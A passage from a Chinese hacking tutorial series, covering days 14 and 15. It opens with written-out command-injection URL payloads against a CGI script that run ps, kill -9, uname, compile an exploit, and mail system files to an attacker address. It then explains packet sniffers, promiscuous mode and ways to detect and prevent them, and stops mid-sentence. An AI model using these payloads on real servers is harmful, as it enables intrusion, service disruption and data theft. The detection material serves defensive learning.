《30天打造专业红客》第15章

"ps"　命令　
列出当前运行的进程，告诉攻击者远程主机运行了那些软件，以便从中得到一些安全问题的主意，获得进一步的权限　
Examples：　http：//host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/ps％20…aux｜　http：//host/cgi…bin/bad。cgi？doh=ps％20…aux；　
"kill　and　killall"　命令　
在unix系统这个命令用于杀掉进程，一个攻击者可以用这个命令来停止系统服务和程序，同时可以擦掉攻击者的痕迹，一些exploit会产生很多的子进程　
Examples：　http：//host/cgi…bin/bad。cgi？doh=。。/bin/kill％20…9％200｜　http：//host/cgi…bin/bad。cgi？doh=kill％20…9％200；　
"uname"　命令　
这个命令告诉攻击者远程机器的名字，一些时候，通过这个命令知道web站点位于哪个isp，也许是攻击者曾今访问过的。通常uname　…a来请求，这些都将记录在日志文件中　
Examples：　http：//host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/uname％20…a｜　http：//host/cgi…bin/bad。cgi？doh=uname％20…a；　
"cc；　gcc；　perl；　python；　etc。。。"　编译/解释命令　
攻击者通过wget或者tftp下载exploit，并用cc；gcc这样的编译程序进行编译成可执行程序，进一步获得特权　
Examples：　http：//host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/cc％20Phantasmp。c｜　http：//host/cgi…bin/bad。cgi？doh=gcc％20Phantasmp。c；。/a。out％20…p％2031337；　
如果你查看日志中发现有“perl”　python”这些说明可能攻击者下载远程的perl　；python脚本程序，并试图本地获得特权　
"mail"　命令　
攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱，也肯能是进行邮件炸弹的攻击　
Examples：　http：//host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/mail％20attacker@****cnhonker。org％20《　
『第14天』sniffer，今天开始说它了
sniffers（嗅探器）几乎和inter有一样久的历史了。他们是最早的一个允许系统管理员分析网络和查明哪里有错误发生的工具。但是这个工具也给我们带来很大的方便。今天我们看2个问题：1。什么是sniffer　2。如何防止sniffer的监听。似乎是矛盾的哦，呵呵，要2个方面都知道才能百战百胜嘛
什嘛是sniffer　（抄定义的）
在单选性网络中；　以太网结构广播至网路上所有的机器；　但是只有预定接受信息包的那台计算机才会响应。　不过网路上其他的计算机同样会〃看到〃这个信息包；但是如果他们不是预定的接受者；他们会排除这个信息包。　当一台计算机上运行着sniffer的时候并且网络处于监听所有信息交通的状态；　那么这台计算机就有能力浏览所有的在网络上通过的信息包。（这个当然很爽了）
那你就有个问题谁使用这个呢？lan/wan　管理员使用sniffers来分析网络信息交通并且找出网络上何处发生问题。一个安全管理员可以同时用多种sniffers；　将它们放置在网络的各处；形成一个入侵警报系统。对于系统管理员来说sniffers是一个非常好的工具，当然还有我们大家了。那常见的sniffers　有哪些呢？很多，我常用的有Sniffer　Pro。当然看一些文章介绍了snoop，但注意这是在UNIX下的，我没怎么用　过　，所以就不说这个了。至于其他一些好用的，我想你学到现在了应该可以自己找了（上GOOGLE　或是BAIDU都可以，不然去。yahoo。也不错的）。
那怎么防止sniffer的监听？
显而易见的；保护网络不受sniffer监听的方法就是不要让它们进入。　如果一个人不能通过你的系统进入的话；那么他们无法安装sniffers。当有人看上一个大多数网络通讯流通的中心区域（防火墙或是代理服务器）时；他们便确定这是他们的攻击目标并将被监视。一些可能的〃受害者〃在服务器的旁边；这时候个人信息将被截获（可能是各种信息甚至是密码）
一个好的方式来保护你的网络不受sniffer监视是将网络用以太网接线器代替普通的集线器分成尽可能多的段。接线器可以分割你的网络通讯并防止每一个系统〃看到〃每个信息包。坏处是这种东西太贵了，这个还是很重要的
另一个方法是；和那种接线器比就是加密术。Sniffer依然可以监视到信息的传送；但是显示的是乱码。但这个有问题就是网络会延迟，当然还有速度问题和使用一个弱加密术比较容易被攻破。
用一些软件也可以帮助你查出是不是有人在监视你，比如AntiSniff（很小的，但可以扫描你的网路并测试一台计算机是否运行在混杂模式（监听网路上每个数据包）什么意思？你看看上面的类容吧），下载：http：//。pdasky。。cn/down。asp？id=2876&no=1
『第15天』网络监听技术分析　纯属理论
今天我们先说几个基本概念。首先，我们知道，一台接在以太网内的计算机为了和其他主机进行通讯，在硬件上是需要网卡，在软件上是需要网卡驱动程序的。而每块网卡在出厂时都有一个唯一的不与世界上任何一块网卡重复的硬件地址，称为mac地址。同时，当网络中两台主机在实现tcp/ip通讯时，网卡还必须绑定一个唯一的ip地址。
对我们来说，浏览网页，收发邮件等都是很平常，很简便的工作，其实在后台这些工作是依*tcp/ip协议族实现的，大家知道有两个主要的网络体系：OSI参考模型和TCP/IP参考模型，OSI模型即为通常说的7层协议，它由下向上分别为物理层、数据链路层、网络层、传输层、会话层、表示层、应用层，而tcp/ip模型中去掉了会话层和表示层后，由剩下的5层构成了互联网的基础，在网络的后台默默的工作着。
当局域网内（因为我们最常见的就是局域网）的主机都通过HUB等方式连接时，一般都称为共享式的连接（就是大家长说的共享），这种共享式的连接有一个很明显的特点：就是HUB会将接收到的所有数据向HUB上的每个端口转发，也就是说当主机根据mac地址进行数据包发送时，尽管发送端主机告知了目标主机的地址，但这并不意味着在一个网络内的其他主机听不到发送端和接收端之间的通讯，只是在正常状况下其他主机会忽略这些通讯报文而已！如果这些主机不愿意忽略这些报文，网卡被设置为promiscuous状态的话，那么，对于这台主机的网络接口而言，任何在这个局域网内传输的信息都是可以被听到的。如果网卡被设置为为混杂模式（promiscuous），主机将会默不作声的听到以太网内传输的所有信息，也就是说：窃听也就因此实现了！
对发生在局域网的其他主机上的监听，一直以来，都缺乏很好的检测方法。这是由于产生网络监听行为的主机在工作时总是不做声的收集数据包，几乎不会主动发出任何信息。但可惜的有些大虾们就爱动脑筋啊；现在已经有些方法了
1：反应时间
向怀疑有网络监听行为的网络发送大量垃圾数据包，根据各个主机回应的情况进行判断，正常的系统回应的时间应该没有太明显的变化，而处于混杂模式的系统由于对大量的垃圾信息照单全收，所以很有可能回应时间会发生较大的变化。这个方法很好；但有时候也没用因为大家没经验嘛
2：观测dns
许多的网络监听软件都会尝试进行地址反向解析，在怀疑有网络监听发生时可以在dns系统上观测有没有明显增多的解析请求。没DNS的或者不能接触的就有点郁闷了
3：利用ping模式进行监测
这个方法我不怎么知道；看了一些文章就COPY了一下；有点头晕；但应该能看懂：假设我们怀疑的主机的硬件地址是00：30：6E：00：9B：B9；它的ip地址是192。168。1。1；那么我们现在伪造出这样的一种icmp数据包：硬件地址是不与局域网内任何一台主机相同的00：30：6E：00：9B：9B；目的地址是192。168。1。1不变，我们可以设想一下这种数据包在局域网内传输会发生什么现象：任何正常的主机会检查这个数据包，比较数据包的硬件地址，和自己的不同，于是不会理会这个数据包，而处于网络监听模式的主机呢？由于它的网卡现在是在混杂模式的，所以它不会去对比这个数据包的硬件地址，而是将这个数据包直接传到上层，上层检查数据包的ip地址，符合自己的ip，于是会对对这个ping的包做出回应。这样，一台处于网络监听模式的主机就被发现了。
4：利用arp数据包进行监测
这个方法和上面的差不多；它使用arp数据包替代了上述的icmp数据包而已；向局域网内的主机发送